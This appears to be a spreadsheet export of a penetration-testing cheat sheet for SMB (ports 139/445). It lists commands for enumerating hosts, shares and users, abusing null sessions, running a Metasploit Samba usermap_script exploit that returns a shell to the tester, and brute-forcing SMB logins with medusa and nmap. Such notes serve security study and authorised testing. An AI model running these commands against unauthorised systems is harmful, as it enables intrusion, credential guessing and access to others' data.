ABCDEFGHIJKLMNOPQRSTUVWXYZ
1
SMB - 139/445
2
CategoriesOSToolIntentCommandComments
3
139/445 - smbLinuxnmblookup Enumerate hostnamenmblookup -A <victim_ip>
4
139/445 - smbLinuxenum4linuxEnumerate hostnameenum4linux -n <victim_ip>Versions Samba 2.2.x are red flag
5
139/445 - smbLinux / WindowsnmapQuick Enumeration$ nmap --script=smb-enum* --script-args=unsafe=1 -T5 <victim_ip>
6
139/445 - smbLinuxsmbver scriptget versionsmbver.sh <victim_ip>Script used to get smb version if nmap fails
7
139/445 - smbLinuxMetasploitget versionMsfconsole;use scanner/smb/smb_versionmetasploit modele to get smb version
8
139/445 - smbLinuxngrepget versionngrep -i -d tap0 's.?a.?m.?b.?a.*[[:digit:]]'
smbclient -L \\\\<victim_ip>		Manual method to get version if all else fails
9
139/445 - smblinux / windowswiresharkget version#1:run Wireshark
#2:smbmap -H <victim_ip>
#3:follow the tcp stream of the smb negotiation		noted by 1kwstassak in reddit.com
10
139/445 - smblinuxsmbmapget sharessmbmap -H <victim_ip> -R <sharename>
Recursively display files in specific share
11
139/445 – smblinuxsmbclientget sharesecho exit | smbclient -L \\\\$ip
12
139/445 - smblinuxsmbclientget sharessmbclient \\\\<victim_ip>\\<share>
more details in cherrytree file (1.information gathering > Active > Enumeration > Services > 139.SMB)
13
139/445 – smblinuxsmbclientget sharessmbclient -L //<victim_ip> -N-N Force the tool to not ask for password
14
139/445 - smbLinux / Windowsnmapget sharesnmap --script smb-enum-shares -p139,445 -T4 -Pn <victim_ip>
15
139/445 - smblinuxsmbclientget sharessmbclient -L \\\\<victim_ip>\\
more details in cherrytree file (1.information gathering > Active > Enumeration > Services > 139.SMB)
16
139/445 - smblinuxsmbmapCheck Null Sessionssmbmap -H <victim_ip>vulnerable version :
Windows NT, 2000, and XP (most SMB1) - VULNERABLE: Null Sessions can be created by default
Windows 2003, and XP SP2 onwards - NOT VULNERABLE: Null Sessions can't be created default
Most Samba (Unix) servers
17
139/445 – smblinuxrpcclientCheck Null Sessionsrpcclient -U "" -N $ip
18
139/445 – smblinuxsmbclientCheck Null Sessionssmbclient //<victim_ip>/IPC$ -NSuccess #:/smb>
19
139/445 – smblinuxenumExploit null Sessionsenum -s <victim_ip>enumerate the shares of a machine
20
139/445 – smblinuxenumExploit null Sessionsenum -U <victim_ip>-U enumerate usersA133:AMJ133
21
139/445 – smblinuxenumExploit null Sessionsenum -P <victim_ip>-P check the password policy
22
139/445 – smblinuxenum4linuxExploit null Sessionsenum4linux -a <victim_ip>enum4linux -a (use all enum switches useres/shares/password policies)
23
139/445 – smblinuxsamrdump.pyExploit null Sessionsusing /usr/share/doc/python3-impacket/examples/samrdump.py
#./samrdump.py <victim_ip>
24
139/445 - smblinuxsmbclientconnect to Username shares$ smbclient //$ip/share -U usernamethis step required u have a cred
25
139/445 - smblinuxsmbclientconnect to share Anonymouslysmbclient \\\\<victim_ip>\\<share>more details in cherrytree file (1.information gathering > Active > Enumeration > Services > 139.SMB)
Example : smbclient \\\\<victim_ip>\\IPC$
26
139/445 - smblinuxsmbclientconnect to share Anonymouslysmbclient //<victim_ip>/<share>
27
139/445 - smblinuxsmbclientconnect to share Anonymouslysmbclient //<victim_ip>/<share\ name>
smbclient //<victim_ip>/<"share name">		If share has a space inbetween its name (eg. "My Shares")
28
139/445 - smblinuxrpcclientconnect to share Anonymouslyrpcclient -U " " <victim_ip>Connect to null share which is the IPC$ share, enumerate with specifc commands, refer to onenote
29
139/445 - smblinuxrpcclientconnect to share Anonymouslyrpcclient -U " " -N <victim_ip>Connect to null share which is the IPC$ share, enumerate with specifc commands, refer to onenote
30
139/445 – smblinux / Windowsnmapcheck vulnnmap --script smb-vuln* -p139,445 -T4 -Pn <victim_ip>
31
139/445 – smbLinux / WindowsMetasploitcheck common security concerns#msf> resource smb_checks.rc
Or
# msfconsole -r /usr/share/metasploit-framwork/scripts/resource/smb_checks.rc		# This resource scripts will check common security concerns on SMB for Windows.
# Specifically, this script will check for these things: #
# * MS08-067.
# * MS17-010.
# * SMB version 1. #
32
139/445 – smbLinux / WindowsMetasploitextra validation#msf> resource smb_validate.rc
Or
# msfconsole -r /usr/share/metasploit-framwork/scripts/resource/smb_validate.rc		after running the previous check
33
139/445 – smbLinux / WindowsMetasploitmulti exploitsmsfconsole; use exploit/multi/samba/usermap_script; set lhost 192.168.0.X; set rhost $ip; run
34
139/445 – smblinuxnmap/medusaBrute Force loginafter enumerating users u can brute force login
#medusa -h <victim_ip> -u userhere -P /usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt -M smbnt
#nmap -p445 --script smb-brute --script-args userdb=userfilehere,passdb=/usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000000.txt <victim_ip> -vvvv
#nmap –script smb-brute <victim_ip>
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100